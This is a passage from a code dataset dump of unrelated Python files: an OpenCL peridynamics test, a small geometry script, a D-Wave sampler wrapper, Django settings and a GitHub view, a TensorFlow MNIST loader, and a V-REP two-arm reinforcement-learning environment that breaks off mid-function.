np.all(n_neigh == n_neigh_expected)\n\n r = np.array([\n [0.0, 0.0, 0.0],\n [2.0, 0.0, 0.0],\n [0.0, 1.0, 0.0],\n [3.0, 0.0, 0.0],\n [0.0, 0.0, 2.0],\n ])\n critical_strain = 1.0\n\n # Create buffers\n r_d = cl.Buffer(context, mf.READ_ONLY | mf.COPY_HOST_PTR, hostbuf=r)\n r0_d = cl.Buffer(context, mf.READ_ONLY | mf.COPY_HOST_PTR, hostbuf=r0)\n nlist_d = cl.Buffer(context, mf.READ_WRITE | mf.COPY_HOST_PTR,\n hostbuf=nl)\n n_neigh_d = cl.Buffer(context, mf.READ_WRITE | mf.COPY_HOST_PTR,\n hostbuf=n_neigh)\n\n # Call kernel\n break_bonds = program.break_bonds\n break_bonds(queue, n_neigh.shape, None, r_d, r0_d, nlist_d, n_neigh_d,\n np.int32(max_neigh), np.float64(critical_strain))\n cl.enqueue_copy(queue, nl, nlist_d)\n cl.enqueue_copy(queue, n_neigh, n_neigh_d)\n\n nl_expected = np.array([\n [2, 2, 4],\n [3, 3, 0],\n [0, 0, 0],\n [1, 0, 0],\n [0, 0, 0]\n ])\n n_neigh_expected = np.array([1, 1, 1, 1, 0])\n\n assert np.all(nl == nl_expected)\n assert np.all(n_neigh == n_neigh_expected)\n","sub_path":"peridynamics/test/test_cl.py","file_name":"test_cl.py","file_ext":"py","file_size_in_byte":9458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"551700900","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\nimport math\r\n\r\nAB = float(input(\"Длина первой стороны\"))\r\nAC = float(input(\"Длина второй стороны\"))\r\n\r\nprint(\"Периметр прямоугольника\", ((AB + AC) * 2))\r\nprint(\"Диоганаль прямоугольника\", ((math.sqrt(AB ** 2 + AC ** 2))))\r\n","sub_path":"individual_2.py","file_name":"individual_2.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"379401930","text":"\"\"\"\nCreates a dimod Sampler_ for the D-Wave System.\n\n.. _Sampler: http://dimod.readthedocs.io/en/latest/reference/samplers.html#samplers-and-composites\n\"\"\"\nimport dimod\nimport dwave.cloud.qpu as qpuclient\n\n__all__ = ['DWaveSampler']\n\n\nclass DWaveSampler(dimod.Sampler, dimod.Structured):\n \"\"\"dimod Sampler for a D-Wave System.\n\n A :class:`dimod.Sampler` that allows the D-Wave System to be used with the Ocean tools.\n\n Also inherits from :class:`dimod.Structured`.\n\n Args:\n config_file (str, optional):\n Path to the configuration file.\n\n profile (str, optional):\n ID of the config profile.\n\n endpoint (str, optional):\n D-Wave API endpoint URL.\n\n token (str, optional):\n Authentication token for the D-Wave API.\n\n solver (str, optional):\n Default solver.\n\n proxy (str, optional):\n Proxy URL to be used for accessing the D-Wave API.\n\n .. _configuration: http://dwave-micro-client.readthedocs.io/en/latest/#configuration\n\n \"\"\"\n def __init__(self, config_file=None, profile=None, endpoint=None, token=None, solver=None,\n proxy=None, permissive_ssl=False):\n\n self.client = client = qpuclient.Client.from_config(config_file=config_file, profile=profile,\n endpoint=endpoint, token=token, proxy=proxy,\n permissive_ssl=permissive_ssl)\n self.solver = solver = client.get_solver(name=solver)\n\n # need to set up the nodelist and edgelist, properties, parameters\n self._nodelist = sorted(solver.nodes)\n self._edgelist = sorted(set(tuple(sorted(edge)) for edge in solver.edges))\n self._properties = solver.properties.copy() # shallow copy\n self._parameters = {param: ['parameters'] for param in solver.properties['parameters']}\n\n @property\n def properties(self):\n \"\"\"dict: The properties as exposed by the SAPI web service.\"\"\"\n return self._properties\n\n @property\n def parameters(self):\n \"\"\"dict[str, list]: The keys are the keyword parameters accepted by SAPI web service. The\n values are lists properties in :attr:`.DWaveSampler.properties` that are relevent to the\n keyword.\n \"\"\"\n return self._parameters\n\n @property\n def edgelist(self):\n \"\"\"list: The list of active couplers.\"\"\"\n return self._edgelist\n\n @property\n def nodelist(self):\n \"\"\"list: The list of active qubits.\"\"\"\n return self._nodelist\n\n def sample_ising(self, h, J, **kwargs):\n \"\"\"Sample from the provided Ising model.\n\n Args:\n h (list/dict):\n The linear biases of the model.\n\n quadratic (dict[(int, int): float]):\n The quadratic biases of the model.\n\n **kwargs:\n Optional keyword arguments for the sampling method, specified per solver in\n :attr:`.DWaveSampler.parameters`\n\n Returns:\n :class:`dimod.Response`\n\n \"\"\"\n if isinstance(h, list):\n h = dict(enumerate(h))\n\n variables = set(h).union(*J)\n try:\n active_variables = sorted(variables)\n except TypeError:\n active_variables = list(variables)\n num_variables = len(active_variables)\n\n data_vector_keys = {'energies': 'energy',\n 'num_occurrences': 'num_occurrences'}\n info_keys = {'timing'}\n\n future = self.solver.sample_ising(h, J, **kwargs)\n return dimod.Response.from_futures((future,), vartype=dimod.SPIN,\n num_variables=num_variables,\n data_vector_keys=data_vector_keys,\n active_variables=active_variables,\n info_keys=info_keys)\n\n def sample_qubo(self, Q, **kwargs):\n \"\"\"Sample from the provided QUBO.\n\n Args:\n Q (dict):\n The QUBO coefficients.\n\n **kwargs:\n Optional keyword arguments for the sampling method, specified per solver in\n :attr:`.DWaveSampler.parameters`\n\n Returns:\n :class:`dimod.Response`\n\n \"\"\"\n variables = set().union(*Q)\n try:\n active_variables = sorted(variables)\n except TypeError:\n active_variables = list(variables)\n num_variables = len(active_variables)\n\n data_vector_keys = {'energies': 'energy',\n 'num_occurrences': 'num_occurrences'}\n info_keys = {'timing'}\n\n future = self.solver.sample_qubo(Q, **kwargs)\n return dimod.Response.from_futures((future,), vartype=dimod.BINARY,\n num_variables=num_variables,\n data_vector_keys=data_vector_keys,\n active_variables=active_variables,\n info_keys=info_keys)\n","sub_path":"dwave/system/samplers/dwave_sampler.py","file_name":"dwave_sampler.py","file_ext":"py","file_size_in_byte":5155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"478025638","text":"\"\"\"Django settings for albums project.\r\n\"\"\"\r\nimport pathlib\r\nHOME = pathlib.Path(__file__).parent.resolve()\r\n\r\n# Make this unique, and don't share it with anybody.\r\nSECRET_KEY = ''\r\n\r\nDEBUG = True\r\n\r\nALLOWED_HOSTS = ['.lemoncurry.nl']\r\n\r\nINSTALLED_APPS = (\r\n 'django.contrib.admin',\r\n 'django.contrib.auth',\r\n 'django.contrib.contenttypes',\r\n 'django.contrib.sessions',\r\n 'django.contrib.sites',\r\n 'django.contrib.messages',\r\n 'django.contrib.staticfiles',\r\n 'albums.muziek',\r\n 'django.contrib.admindocs',\r\n)\r\n\r\nMIDDLEWARE_CLASSES = (\r\n 'django.contrib.sessions.middleware.SessionMiddleware',\r\n 'django.middleware.common.CommonMiddleware',\r\n 'django.middleware.csrf.CsrfViewMiddleware',\r\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\r\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\r\n 'django.contrib.messages.middleware.MessageMiddleware',\r\n 'django.middleware.clickjacking.XFrameOptionsMiddleware', # nieuw in 1.6\r\n 'django.middleware.security.SecurityMiddleware', # nieuw in 1.8\r\n)\r\n\r\nROOT_URLCONF = 'albums.urls'\r\n\r\nTEMPLATES = [\r\n {\r\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\r\n 'DIRS': [\r\n str(HOME / 'templates'),\r\n ],\r\n 'APP_DIRS': True,\r\n 'OPTIONS': {\r\n 'context_processors': [\r\n 'django.template.context_processors.debug',\r\n 'django.template.context_processors.request',\r\n 'django.contrib.auth.context_processors.auth',\r\n 'django.contrib.messages.context_processors.messages',\r\n ],\r\n ## 'loaders': [\r\n ## # 'django.template.loaders.eggs.Loader',\r\n ## 'django.template.loaders.filesystem.Loader',\r\n ## 'django.template.loaders.app_directories.Loader',\r\n ## ],\r\n },\r\n },\r\n]\r\n\r\nWSGI_APPLICATION = 'albums.wsgi.application'\r\n\r\nADMINS = (\r\n # ('Your Name', 'your_email@domain.com'),\r\n)\r\n\r\nMANAGERS = ADMINS\r\n\r\nDATABASES = {\r\n 'default': {\r\n 'ENGINE': 'django.db.backends.sqlite3',\r\n 'NAME': str(HOME / 'albums.db'),\r\n 'USER': '', # Not used with sqlite3.\r\n 'PASSWORD': '', # Not used with sqlite3.\r\n 'HOST': '', # Set to empty string for localhost. Not used with sqlite3.\r\n 'PORT': '', # Set to empty string for default. Not used with sqlite3.\r\n }\r\n}\r\n\r\n# Local time zone for this installation. Choices can be found here:\r\n# http://www.postgresql.org/docs/8.1/static/datetime-keywords.html#DATETIME-TIMEZONE-SET-TABLE\r\n# although not all variations may be possible on all operating systems.\r\n# If running in a Windows environment this must be set to the same as your\r\n# system time zone.\r\nTIME_ZONE = 'Europe/Amsterdam'\r\n\r\n# Language code for this installation. All choices can be found here:\r\n# http://www.w3.org/TR/REC-html40/struct/dirlang.html#langcodes\r\n# http://blogs.law.harvard.edu/tech/stories/storyReader$15\r\nLANGUAGE_CODE = 'en-us'\r\n\r\nSITE_ID = 1\r\n\r\n# If you set this to False, Django will make some optimizations so as not\r\n# to load the internationalization machinery.\r\nUSE_I18N = True\r\n\r\n# If you set this to False, Django will not format dates, numbers and\r\n# calendars according to the current locale.\r\nUSE_L10N = True\r\n\r\n# If you set this to False, Django will not use timezone-aware datetimes.\r\nUSE_TZ = True\r\n\r\n# Absolute path to the directory that holds media.\r\n# Example: \"/home/media/media.lawrence.com/\"\r\n# MEDIA_ROOT = \"C:/Python25/Lib/site-packages/django/contrib/admin/media/\"\r\nMEDIA_ROOT = str(HOME / \"files/\")\r\n\r\n# URL that handles the media served from MEDIA_ROOT.\r\n# Example: \"http://media.lawrence.com\"\r\nMEDIA_URL = 'http://albums.lemoncurry.nl/files/'\r\n\r\n# Absolute path to the directory static files should be collected to.\r\n# Don't put anything in this directory yourself; store your static files\r\n# in apps' \"static/\" subdirectories and in STATICFILES_DIRS.\r\n# Example: \"/home/media/media.lawrence.com/static/\"\r\nSTATIC_ROOT = ''\r\n\r\n# URL prefix for static files.\r\n# Example: \"http://media.lawrence.com/static/\"\r\nSTATIC_URL = '/static/'\r\n\r\n# Additional locations of static files\r\nSTATICFILES_DIRS = (\r\n # Put strings here, like \"/home/html/static\" or \"C:/www/django/static\".\r\n # Always use forward slashes, even on Windows.\r\n # Don't forget to use absolute paths, not relative paths.\r\n)\r\n\r\n# List of finder classes that know how to find static files in\r\n# various locations.\r\nSTATICFILES_FINDERS = (\r\n 'django.contrib.staticfiles.finders.FileSystemFinder',\r\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\r\n # 'django.contrib.staticfiles.finders.DefaultStorageFinder',\r\n)\r\n\r\nSESSION_COOKIE_DOMAIN = 'albums.lemoncurry.nl'\r\n","sub_path":"albums/settings_no_key.py","file_name":"settings_no_key.py","file_ext":"py","file_size_in_byte":4813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"65262902","text":"\"\"\" Handler for URLs for the http://github.com service.\nGitHub doesn't really have a decent oauth service so again we\nare hitting public json feeds and processing those.\n\"\"\"\n\nfrom datetime import datetime\nfrom causal.main.decorators import can_view_service\nfrom causal.main.models import UserService, Auth\nfrom causal.main.utils.services import get_model_instance, \\\n settings_redirect, check_is_service_id, get_data\nfrom causal.main.utils.views import render\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import get_object_or_404, redirect\nfrom datetime import date, timedelta\n\nPACKAGE = 'causal.github'\n\n@login_required(redirect_field_name='redirect_to')\ndef auth(request):\n \"\"\"We dont need a full oauth setup just a username.\n \"\"\"\n\n service = get_model_instance(request.user, PACKAGE)\n if service and request.method == 'POST':\n username = request.POST['username']\n\n if username:\n user_feed = get_data(\n service,\n 'https://api.github.com/users/%s' % (username),\n disable_oauth=True\n )\n\n if user_feed.has_key('message') and user_feed['message'] == \"Not Found\":\n messages.error(request,\n 'Unable to validate your username with github, please check your username and retry.')\n return redirect(settings_redirect(request))\n \n if not service.auth:\n auth_handler = Auth()\n else:\n auth_handler = service.auth\n\n auth_handler.username = username\n auth_handler.save()\n\n if not service.auth:\n service.auth = auth_handler\n\n service.setup = True\n service.public = True\n service.save()\n \n else:\n messages.error(request, 'Please enter a github username')\n\n return redirect(settings_redirect(request))\n\n@can_view_service\ndef stats(request, service_id):\n \"\"\"Create up some stats.\n \"\"\"\n\n service = get_object_or_404(UserService, pk=service_id)\n\n if check_is_service_id(service, PACKAGE):\n commits, avatar, commit_times, common_time, days_committed, max_commits_on_a_day = service.handler.get_stats_items(date.today() - timedelta(days=7))\n\n return render(\n request,\n {\n 'commits': commits,\n 'avatar' : avatar,\n 'commit_times' : commit_times,\n 'common_time' : common_time,\n 'days_committed' : days_committed, \n 'max_commits_on_a_day' : max_commits_on_a_day\n },\n 'causal/github/stats.html'\n )\n else:\n return redirect('/%s' % (request.user.username,))\n","sub_path":"src/causal/github/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"613067159","text":"import tensorflow as tf\nimport pandas as pd\nimport numpy as np\nimport os\n\nimport scipy.misc\n\n\n# df = pd.read_csv('./kaggle/train.csv', sep=',')\n# labels = df.iloc[:, :1]\n# images = df.iloc[:, 1:]\n# print(labels)\n\ndef _fixed_sides_resize(image, output_height, output_width):\n \"\"\"Resize images by fixed sides.\n\n Args:\n image: A 3-D image `Tensor`.\n output_height: The height of the image after preprocessing.\n output_width: The width of the image after preprocessing.\n\n Returns:\n resized_image: A 3-D tensor containing the resized image.\n \"\"\"\n output_height = tf.convert_to_tensor(output_height, dtype=tf.int32)\n output_width = tf.convert_to_tensor(output_width, dtype=tf.int32)\n\n image = tf.expand_dims(image, 0)\n resized_image = tf.image.resize_nearest_neighbor(\n image, [output_height, output_width], align_corners=False) # 返回[batch, height, width, channels]\n resized_image = tf.squeeze(resized_image, 0) # 去掉batch,留下[224, 224, 1]\n resized_image = tf.concat([resized_image, resized_image, resized_image], -1) # 单通道叠到3通道\n # resized_image = tf.expand_dims(resized_image, 2)\n # resized_image.set_shape([None, None, 1])\n return resized_image\n\n\ndef read(df):\n dataset = tf.data.Dataset.from_tensor_slices(dict(df))\n\n def map_fn(element, label_feat):\n # element is a {'c0': int, 'c1': str, 'c2': int} dictionary\n label = element.pop(label_feat)\n # img = list(element.values())\n return (element, label)\n\n\n # Split it into features, label tuple\n dataset = dataset.map(lambda elem: map_fn(elem, 'label'))\n\n # One shot iterator iterates through the (repeated) dataset once\n\n iterator = dataset.make_one_shot_iterator()\n image, label = iterator.get_next()\n\n # image_raw = tf.reshape(image, [28, 28])\n\n # images, label_batch = tf.train.batch(\n # [image_raw, label],\n # batch_size=32,\n # num_threads=1,\n # capacity=64)\n\n # n_classes = 10\n # label_batch = tf.one_hot(label_batch, depth=n_classes)\n # label_batch = tf.cast(label_batch, dtype=tf.int32)\n # label_batch = tf.reshape(label_batch, [32, n_classes])\n\n return image, label\n\n\ndef get(df, batch_size):\n\n def _parse_function(label, img):\n image_raw = tf.reshape(img, [28, 28, 1])\n return label, image_raw\n\n labels = df['label']\n df.drop(['label'], axis=1, inplace=True)\n imgs = df\n dataset = tf.data.Dataset.from_tensor_slices((labels, imgs))\n dataset = dataset.map(_parse_function)\n dataset = dataset.repeat(10)\n dataset = dataset.batch(batch_size)\n\n iterator = dataset.make_one_shot_iterator()\n label, image = iterator.get_next()\n return image, label\n\ndef val(df, batch_size):\n def _parse_function(img):\n image_raw = tf.reshape(img, [28, 28, 1])\n return image_raw\n\n dataset = tf.data.Dataset.from_tensor_slices(df)\n dataset = dataset.map(_parse_function)\n dataset = dataset.batch(batch_size)\n\n iterator = dataset.make_one_shot_iterator()\n image = iterator.get_next()\n return image\n\ndef get_resnet(df, batch_size):\n def _parse_function(image, label):\n img = tf.reshape(image, [28, 28, 1])\n image_raw = _fixed_sides_resize(img, 224, 224)\n return tf.to_float(image_raw), label\n\n labels = df['label']\n df.drop(['label'], axis=1, inplace=True)\n imgs = df\n # dataset = tf.data.Dataset.from_tensor_slices((labels, imgs))\n dataset = tf.data.Dataset.from_tensor_slices((imgs, labels))\n dataset = dataset.map(_parse_function)\n dataset = dataset.repeat(10)\n # dataset = dataset.batch(batch_size)\n dataset = dataset.apply(tf.contrib.data.batch_and_drop_remainder(batch_size))\n # dataset = dataset.prefetch(2)\n return dataset\n\n # # resnet的输入时dataset,所以不需要进一步处理\n # iterator = dataset.make_one_shot_iterator()\n # label, image = iterator.get_next()\n # return image, label\n \ndef get_resnet_val(df):\n def _parse_function(image):\n img = tf.reshape(image, [28, 28, 1])\n image_raw = _fixed_sides_resize(img, 224, 224)\n return tf.to_float(image_raw)\n\n imgs = df\n dataset = tf.data.Dataset.from_tensor_slices(imgs)\n dataset = dataset.map(_parse_function)\n \n iterator = dataset.make_one_shot_iterator()\n image = iterator.get_next()\n return image\n\n# with tf.Session() as sess:\n# sess.run(tf.global_variables_initializer())\n# df = pd.read_csv('./kaggle/Digit Recognizer/data/train.csv', sep=',')\n# reshaped_image = get_resnet(df, 10)\n#\n# for i in range(1):\n# # 每次sess.run(reshaped_image),都会取出一张图片\n# imgs, labels = sess.run(reshaped_image)\n# k = 0\n# print('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx')\n# for img in imgs:\n# print('cccccccccccccccccccccccccccccccccccccc')\n# # np.savetxt(\"prediction\" + str(k) + \".csv\", img, delimiter=\",\")\n# scipy.misc.imsave('./kaggle/Digit Recognizer/output/img/test_%d.jpg' % k, img)\n# # with open() as f:\n# # f.write(img)\n# k += 1\n# for label in labels:\n# print(label)\n# # print(imgs)\n# # np.savetxt(\"prediction\" + str(i) + \".csv\", img, delimiter=\",\")\n# # print(label)\n\n# with tf.Session() as sess:\n# sess.run(tf.global_variables_initializer())\n# df = pd.read_csv('./kaggle/test.csv', sep=',')\n# image_raw = sess.run(tf.reshape(df[5:6], [28, 28]))\n# np.savetxt(\"prediction.csv\", image_raw, delimiter=\",\")","sub_path":"kaggle/Digit Recognizer/input_data.py","file_name":"input_data.py","file_ext":"py","file_size_in_byte":5602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"122481543","text":"# VREP 环境 动力学\n# 同步模式\n\nimport vrep\nimport math\nimport time\nimport numpy as np\n\nclass VREP_server(object):\n ToDeg = 180.0 / math.pi # 常数,弧度转度数\n ToRad = math.pi / 180.0 # 常数,角度转弧度\n dt = 0.05 # 定义仿真步长 50 ms\n state_dim = 12\n action_dim = 6\n # 配置关节信息\n rewardflag = [1,1,1]\n jointNum = 3\n jointName = 'joint'\n linkName = 'link'\n obsName = 'obs1'\n config1 = [56. *ToRad,-30.*ToRad,-30.*ToRad]\n config2 = [60.*ToRad, -35.*ToRad, -30.*ToRad]\n action_bound = [-1, 1] #动作的幅度限制\n joint_bound = [-90.*ToRad,90.*ToRad]\n get_point = False # 到达期望点\n grab_counter = 0 # 统计到达期望点的次数\n area = 0.05\n get_obstacles = False # 触碰到障碍\n obstacles_counter = 0 # 触碰障碍计数\n\n def __init__(self):\n #建立通信\n vrep.simxFinish(-1)\n # 每隔0.2s检测一次,直到连接上V-rep\n while True:\n self.clientID = vrep.simxStart('127.0.0.1', 19999, True, True, 5000, 5)\n if self.clientID != -1:\n break\n else:\n time.sleep(0.1)\n print(\"Failed connecting to remote API server!\")\n print(\"Connection success!\")\n # 设置机械臂仿真步长,为了保持API端与V-rep端相同步长\n vrep.simxSetFloatingParameter(self.clientID, vrep.sim_floatparam_simulation_time_step, self.dt, vrep.simx_opmode_oneshot)\n # 然后打开同步模式\n vrep.simxSynchronous(self.clientID, True)\n vrep.simxStartSimulation(self.clientID, vrep.simx_opmode_oneshot)\n\n #获取 joint 句柄\n self.robot1_jointHandle = np.zeros((self.jointNum,), dtype=np.int) # joint 句柄\n self.robot2_jointHandle = np.zeros((self.jointNum,), dtype=np.int) # joint 句柄\n for i in range(self.jointNum):\n _, returnHandle = vrep.simxGetObjectHandle(self.clientID, self.jointName + str(i + 1),\n vrep.simx_opmode_blocking)\n self.robot1_jointHandle[i] = returnHandle\n for i in range(self.jointNum):\n _, returnHandle = vrep.simxGetObjectHandle(self.clientID, self.jointName + str(i + 4),\n vrep.simx_opmode_blocking)\n self.robot2_jointHandle[i] = returnHandle\n # 获取 Link 句柄\n self.robot1_linkHandle = np.zeros((self.jointNum,), dtype=np.int) # link 句柄\n self.robot2_linkHandle = np.zeros((self.jointNum,), dtype=np.int) # link 句柄\n for i in range(self.jointNum):\n _, returnHandle = vrep.simxGetObjectHandle(self.clientID, self.linkName + str(i + 1),\n vrep.simx_opmode_blocking)\n self.robot1_linkHandle[i] = returnHandle\n for i in range(self.jointNum):\n _, returnHandle = vrep.simxGetObjectHandle(self.clientID, self.linkName + str(i + 4),\n vrep.simx_opmode_blocking)\n self.robot2_linkHandle[i] = returnHandle\n # 获取碰撞句柄\n _, self.robot1_collisionHandle = vrep.simxGetCollisionHandle(self.clientID, 'Collision_robot1', vrep.simx_opmode_blocking)\n _, self.robot2_collisionHandle = vrep.simxGetCollisionHandle(self.clientID, 'Collision_robot2', vrep.simx_opmode_blocking)\n\n # 获取距离句柄\n # _,self.mindist_robot1_Handle = vrep.simxGetDistanceHandle(self.clientID,'dis_robot1',vrep.simx_opmode_blocking)\n # _,self.mindist_robot2_Handle = vrep.simxGetDistanceHandle(self.clientID,'dis_robot2', vrep.simx_opmode_blocking)\n # _,self.mindist_robots_Handle = vrep.simxGetDistanceHandle(self.clientID,'robots_dist', vrep.simx_opmode_blocking)\n _,self.robot1_goal_Handle = vrep.simxGetDistanceHandle(self.clientID,'robot1_goal',vrep.simx_opmode_blocking)\n _,self.robot2_goal_Handle = vrep.simxGetDistanceHandle(self.clientID,'robot2_goal',vrep.simx_opmode_blocking)\n # 获取末端句柄\n _,self.end1_Handle = vrep.simxGetObjectHandle(self.clientID, 'end',vrep.simx_opmode_blocking)\n _,self.end2_Handle = vrep.simxGetObjectHandle(self.clientID,'end0',vrep.simx_opmode_blocking)\n\n _,self.goal1_Handle = vrep.simxGetObjectHandle(self.clientID, 'goal_1',vrep.simx_opmode_blocking)\n _,self.goal2_Handle = vrep.simxGetObjectHandle(self.clientID, 'goal_2', vrep.simx_opmode_blocking)\n\n _,self.goal_1 = vrep.simxGetObjectPosition(self.clientID,self.goal1_Handle,-1,vrep.simx_opmode_blocking)\n _,self.goal_2 = vrep.simxGetObjectPosition(self.clientID, self.goal2_Handle, -1,vrep.simx_opmode_blocking)\n del self.goal_1[2]\n del self.goal_2[2]\n self.goal_1 = np.array(self.goal_1)\n self.goal_2 = np.array(self.goal_2)\n self.jointConfig1 = np.zeros((self.jointNum,))\n self.jointConfig2 = np.zeros((self.jointNum,))\n for i in range(self.jointNum):\n _, jpos = vrep.simxGetJointPosition(self.clientID, self.robot1_jointHandle[i],vrep.simx_opmode_streaming)\n self.jointConfig1[i] = jpos\n for i in range(self.jointNum):\n _, jpos = vrep.simxGetJointPosition(self.clientID, self.robot2_jointHandle[i],vrep.simx_opmode_streaming)\n self.jointConfig2[i] = jpos\n\n _, collision1 = vrep.simxReadCollision(self.clientID, self.robot1_collisionHandle, vrep.simx_opmode_streaming)\n _, collision2 = vrep.simxReadCollision(self.clientID, self.robot2_collisionHandle, vrep.simx_opmode_streaming)\n _, pos1 = vrep.simxGetObjectPosition(self.clientID, self.end1_Handle, -1, vrep.simx_opmode_streaming)\n _, pos2 = vrep.simxGetObjectPosition(self.clientID, self.end2_Handle, -1, vrep.simx_opmode_streaming)\n _, d1 = vrep.simxReadDistance(self.clientID, self.robot1_goal_Handle, vrep.simx_opmode_streaming)\n _, d2 = vrep.simxReadDistance(self.clientID, self.robot2_goal_Handle, vrep.simx_opmode_streaming)\n for i in range(self.jointNum):\n _,returnpos = vrep.simxGetObjectPosition(self.clientID,self.robot1_linkHandle[i],-1, vrep.simx_opmode_streaming)\n\n for i in range(self.jointNum):\n _,returnpos = vrep.simxGetObjectPosition(self.clientID,self.robot2_linkHandle[i],-1,vrep.simx_opmode_streaming)\n print('data available!')\n self.currCmdTime = vrep.simxGetLastCmdTime(self.clientID)\n self.lastCmdTime = self.currCmdTime\n vrep.simxSynchronousTrigger(self.clientID)\n\n def moveto(self,config1,config2):\n vrep.simxPauseCommunication(self.clientID, True)\n for i in range(self.jointNum):\n vrep.simxSetJointTargetPosition(self.clientID,self.robot1_jointHandle[i], config1[i], vrep.simx_opmode_oneshot)\n for i in range(self.jointNum):\n vrep.simxSetJointTargetPosition(self.clientID,self.robot2_jointHandle[i], config2[i],vrep.simx_opmode_oneshot)\n def getCollisonStates(self):\n _, collision1 = vrep.simxReadCollision(self.clientID,self.robot1_collisionHandle ,vrep.simx_opmode_buffer)\n _, collision2 = vrep.simxReadCollision(self.clientID, self.robot2_collisionHandle,vrep.simx_opmode_buffer)\n return collision1,collision2\n\n def reset(self):\n self.get_point = False\n self.grab_counter = 0\n self.get_obstacles = False\n self.obstacles_counter = 0\n self.currCmdTime = vrep.simxGetLastCmdTime(self.clientID)\n # dt = (self.currCmdTime - self.lastCmdTime) / 1000\n\n self.moveto(self.config1,self.config2)\n vrep.simxPauseCommunication(self.clientID, False)\n self.lastCmdTime = self.currCmdTime\n vrep.simxSynchronousTrigger(self.clientID)\n vrep.simxGetPingTime(self.clientID)\n s = self.getState_v1()\n return s\n\n def step(self,action):\n action = np.clip(action, *self.action_bound)\n self.jointConfig1 = np.zeros((self.jointNum,))\n self.jointConfig2 = np.zeros((self.jointNum,))\n for i in range(self.jointNum):\n _, jpos = vrep.simxGetJointPosition(self.clientID, self.robot1_jointHandle[i],vrep.simx_opmode_buffer)\n self.jointConfig1[i] = jpos\n for i in range(self.jointNum):\n _, jpos = vrep.simxGetJointPosition(self.clientID, self.robot2_jointHandle[i],vrep.simx_opmode_buffer)\n self.jointConfig2[i] = jpos\n # print(self.jointConfig1)\n self.jointConfig1 += action[:3]*self.dt\n self.jointConfig2 += action[-3:]*self.dt\n # self.jointConfig1 %= np.pi*2\n # self.jointConfig2 %= np.pi*2\n self.jointConfig1=np.clip(self.jointConfig1,*self.joint_bound)\n self.jointConfig2 = np.clip(self.jointConfig2, *self.joint_bound)\n self.moveto(self.jointConfig1,self.jointConfig2)\n time.sleep(0.01)\n s_ = self.getState_v1()\n\n r = self._r_func()\n return s_,r,self.get_point,self.get_obstacles\n\n def getState(self):#版本一的状态定义 维度是18\n # output type : list\n _, pos1 = vrep.simxGetObjectPosition(self.clientID,self.end1_Handle,-1, vrep.simx_opmode_buffer)\n _, pos2 = vrep.simxGetObjectPosition(self.clientID, self.end2_Handle,-1,vrep.simx_opmode_buffer)\n del pos1[2]\n del pos2[2]\n pos1 = np.array(pos1)\n pos2 = np.array(pos2)\n s = np.hstack((pos1,pos2))\n robot1_link_pos = np.zeros((self.jointNum,2),dtype=np.float)\n robot2_link_pos = np.zeros((self.jointNum, 2), dtype=np.float)\n for i in range(self.jointNum):\n _,returnpos = vrep.simxGetObjectPosition(self.clientID,self.robot1_linkHandle[i],-1, vrep.simx_opmode_buffer)\n del returnpos[2]\n returnpos = np.array(returnpos)\n robot1_link_pos[i,:] = returnpos-pos1\n for i in range(self.jointNum):\n _,returnpos = vrep.simxGetObjectPosition(self.clientID,self.robot2_linkHandle[i],-1,vrep.simx_opmode_buffer)\n del returnpos[2]\n returnpos = np.array(returnpos)-pos2\n robot2_link_pos[i,:] = returnpos\n robot1_link_pos = np.reshape(robot1_link_pos,newshape=(-1,))\n robot2_link_pos = np.reshape(robot2_link_pos, newshape=(-1,))\n s = np.hstack((s,np.hstack((robot1_link_pos,robot2_link_pos))))\n collision1,collision2=self.getCollisonStates()\n danger = np.array([1. if collision1 else 0. ,1. if collision2 else 0.])\n s = np.hstack((s,danger))\n\n return s\n def getState_v1(self): #版本二的状态定义,维度是14\n jointConfig1 = np.zeros((self.jointNum,))\n jointConfig2 = np.zeros((self.jointNum,))\n for i in range(self.jointNum):\n _, jpos = vrep.simxGetJointPosition(self.clientID, self.robot1_jointHandle[i], vrep.simx_opmode_buffer)\n jointConfig1[i] = jpos\n for i in range(self.jointNum):\n _, jpos = vrep.simxGetJointPosition(self.clientID, self.robot2_jointHandle[i], vrep.simx_opmode_buffer)\n jointConfig2[i] = jpos\n s = np.hstack((jointConfig1, jointConfig2))\n _, pos1 = vrep.simxGetObjectPosition(self.clientID, self.end1_Handle, -1, vrep.simx_opmode_buffer)\n _, pos2 = vrep.simxGetObjectPosition(self.clientID, self.end2_Handle, -1, vrep.simx_opmode_buffer)\n del pos1[2]\n del pos2[2]\n pos1 = np.array(pos1)\n pos2 = np.array(pos2)\n pos = np.hstack((pos1, pos2))\n s = np.hstack((s,pos))\n\n _, d1 = vrep.simxReadDistance(self.clientID, self.robot1_goal_Handle, vrep.simx_opmode_buffer)\n _, d2 = vrep.simxReadDistance(self.clientID, self.robot2_goal_Handle, vrep.simx_opmode_buffer)\n s = np.hstack((s, np.array([d1,d2])))\n # collision1, collision2 = self.getCollisonStates()\n # danger = np.array([1. if collision1 else 0., 1. if collision2 else 0.])\n # s = np.hstack((s, danger))\n return s\n def sample_action(self):\n return np.random.uniform(*self.action_bound, size=self.jointNum*2)\n def _r_func(self):\n t=20\n collision1, collision2 = self.getCollisonStates()\n collision = np.array([1. if collision1 else 0., 1. if collision2 else 0.])\n _,d1 = vrep.simxReadDistance(self.clientID,self.robot1_goal_Handle, vrep.simx_opmode_buffer)\n _,d2 = vrep.simxReadDistance(self.clientID,self.robot2_goal_Handle, vrep.simx_opmode_buffer)\n d = d1+d2\n\n r 